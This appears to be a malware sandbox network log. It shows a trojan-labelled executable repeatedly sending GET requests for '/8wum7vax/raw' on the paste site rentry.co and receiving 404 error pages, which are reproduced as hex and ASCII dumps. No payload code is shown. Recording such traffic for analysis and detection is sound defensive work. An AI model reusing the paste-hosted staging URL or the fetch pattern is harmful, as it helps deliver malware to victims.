                                                                                        2024-10-18 10:44:08 UTC703INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:08 UTC1369INData Raw: 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />
                                                                                        2024-10-18 10:44:08 UTC1369INData Raw: 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20
                                                                                        Data Ascii: ntry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:08 UTC1019INData Raw: 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 36 64 39 64 64 31 36 62 66 36 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 30
                                                                                        Data Ascii: c/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee6d9dd16bf6',t:'MTcyOTI0ODI0
                                                                                        2024-10-18 10:44:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        73192.168.2.660732104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:09 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:44:09 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:09 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GlulnbUlyKOJNw43%2FwYRbqYB8oWxQo4Bie2X3t6HGjI4Flg131VeqGMjFwzPsCcyhgnaV4E5xT%2BZQbRSdAfUd47GVRh1BUj%2BDuyZshNsDG7Kl2lUdrI2vU4EoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee75a9a746d8-DFW
                                                                                        2024-10-18 10:44:09 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:09 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:44:09 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:09 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 37 35 61 39 61 37 34 36 64 38 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 30 4f 53 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee75a9a746d8',t:'MTcyOTI0ODI0OS4wMDAwMD
                                                                                        2024-10-18 10:44:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        74192.168.2.660734104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:10 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:44:10 UTC658INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:10 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7svEN%2BZ4Kl4sjMnfz6gdRXCjTbWWhBekoLj84zOROySQl7aQJXMYbPHtu3zOjoazw5ZGtPaQuvM5EGhdukX5CIthC3ZbtIfiZsgqwC%2Flt0ALf2%2BKUZZ%2F6NHQHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee7c0c08477c-DFW
                                                                                        2024-10-18 10:44:10 UTC711INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:10 UTC1369INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72
                                                                                        Data Ascii: eta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta pr
                                                                                        2024-10-18 10:44:10 UTC1369INData Raw: 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: ; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:10 UTC1010INData Raw: 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 37 63 30 63 30 38 34 37 37 63 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 31 4d 43 34 77 4d 44 41 77
                                                                                        Data Ascii: tstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee7c0c08477c',t:'MTcyOTI0ODI1MC4wMDAw
                                                                                        2024-10-18 10:44:10 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:44:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        75192.168.2.660735104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:11 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:12 UTC681INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:12 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=byYG5N8l%2BEKf6IZIhhlvg%2Fswi5fx1lgKQ9MvzB38ChHejlR%2BRnheWD%2BKlk1o6gawKFnzjsBKX0cysbWFs7YUL8iFqgQ8NaukKWWhIbMUsIaLXGJh5u6Jyc8QbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee8739266bb0-DFW
                                                                                        2024-10-18 10:44:12 UTC688INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:12 UTC1369INData Raw: 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64
                                                                                        Data Ascii: ons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and ed
                                                                                        2024-10-18 10:44:12 UTC1369INData Raw: 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69
                                                                                        Data Ascii: try.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container contai
                                                                                        2024-10-18 10:44:12 UTC1034INData Raw: 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 38 37 33 39 32 36 36 62 62 30 27 2c
                                                                                        Data Ascii: ipt src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee8739266bb0',
                                                                                        2024-10-18 10:44:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        76192.168.2.660736104.26.3.16443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:13 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:44:13 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:13 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2BCKLPM95XtMS7AxT0EQjKorgl6EVYAHakE5lLjvrtRnO66PbZjTmqgUHd8ey%2FFscmW6So3dvMAE%2F2Kg4WYUUTG4vuKv5gzj3Ww3lPBrwaVWnJWv2K9gBNedNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee8e18c14743-DFW
